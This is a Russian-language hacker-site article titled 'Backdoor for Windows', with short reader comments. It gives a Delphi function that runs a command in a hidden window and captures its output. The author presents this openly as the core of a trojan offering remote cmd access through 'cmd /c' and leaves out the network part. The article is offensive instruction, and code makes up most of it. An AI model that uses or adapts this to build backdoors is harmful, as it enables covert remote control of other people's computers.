Бэкдор под винь — HackZona.Ru

Бэкдор под винь

Бэкдор под винь

Тип статьи:
Со старой ХакЗоны.
Источник:
Помню как то на форуме кто то спросил: «Как сделать троян, который мог бы предоставлять доступ к cmd?». Как ни странно на этот вопрос, включая меня, не кто не ответил. Жаль, что тогда достаточных знаний делфи не у кого не было :( Но как то в DRKB (если у вас его нет, а вы программируете на Delphi, то дуйте на www.sources.ru) функцию которая берёт весь вывод из консоли. Надеюсь, вы уже поняли, что это функцию можно заюзать в нужных целях. Итак, не упадите со стула ребята сейчас мы будем делать реальный бэкдор под винды! Собственно функцию я приведу только одну:

function GetDosOutput(const CommandLine:string): string;
var
SA: TSecurityAttributes;
SI: TStartupInfo;
PI: TProcessInformation;
StdOutPipeRead, StdOutPipeWrite: THandle;
WasOK: Boolean;
Buffer: array[0..255] of Char;
BytesRead: Cardinal;
Line: String;
begin
with SA do
begin
nLength := SizeOf(SA);
bInheritHandle := True;
lpSecurityDescriptor := nil;
end;
// создаём пайп для перенаправления стандартного вывода
CreatePipe(StdOutPipeRead, // дескриптор чтения
StdOutPipeWrite, // дескриптор записи
@SA, // аттрибуты безопасности
0 // количество байт принятых для пайпа — 0 по умолчанию
);
try
// Создаём дочерний процесс, используя StdOutPipeWrite в качестве стандартного вывода,
// а так же проверяем, чтобы он не показывался на экране.
with SI do
begin
FillChar(SI, SizeOf(SI), 0);
cb := SizeOf(SI);
dwFlags := STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES;
wShowWindow := SW_HIDE;
hStdInput := GetStdHandle(STD_INPUT_HANDLE); // стандартный ввод не перенаправляем
hStdOutput := StdOutPipeWrite;
hStdError := StdOutPipeWrite;
end;

// Запускаем компилятор из командной строки
WasOK := CreateProcess(nil, PChar(CommandLine), nil, nil, True, 0, nil, nil, SI, PI);

// Теперь, когда дескриптор получен, для безопасности закрываем запись.
// Нам не нужно, чтобы произошло случайное чтение или запись.
CloseHandle(StdOutPipeWrite);
// если процесс может быть создан, то дескриптор, это его вывод
if not WasOK then
raise Exception.Create('Could not execute command line!')
else
try
// получаем весь вывод до тех пор, пока DOS-приложение не будет завершено
Line := '';
repeat
// читаем блок символов (могут содержать возвраты каретки и переводы строки)
WasOK := ReadFile(StdOutPipeRead, Buffer, 255, BytesRead, nil);

// есть ли что-нибудь ещё для чтения?
if BytesRead > 0 then
begin
// завершаем буфер PChar-ом
Buffer[BytesRead] := #0;
// добавляем буфер в общий вывод
Line := Line + Buffer;
end;
until not WasOK or (BytesRead = 0);
// ждём, пока завершится консольное приложение
WaitForSingleObject(PI.hProcess, INFINITE);
finally
// Закрываем все оставшиеся дескрипторы
CloseHandle(PI.hThread);
CloseHandle(PI.hProcess);
end;
finally
result:=Line;
CloseHandle(StdOutPipeRead);
end;
end;


end.


Ну естественно сетевую часть объяснять не надо, ты и так её знаешь, а если нет то ты ещё маленький чтобы бэкдоры писать! А, собственно где тут cmd, чувак спросишь ты. А ты, что забыл, что можно запускать любые команды, запустив cmd с параметром /c и указав сому команду. Например cmd /c dir. Ну ты понял, а если нет, то.
Нравится
Не нравится

8 комментариев

14:16
Информативная статья
02:21
И правду не плохо!
18:17
Пригодится ;))=
14:45
Еще раз убедился в непристрастности этих вирусов...
10:18
Лучше бы на плюсах обьяснил)
11:57
статья не вавжная
13g
17:11
интересно
15:14
да на ++ было бы неплохо :(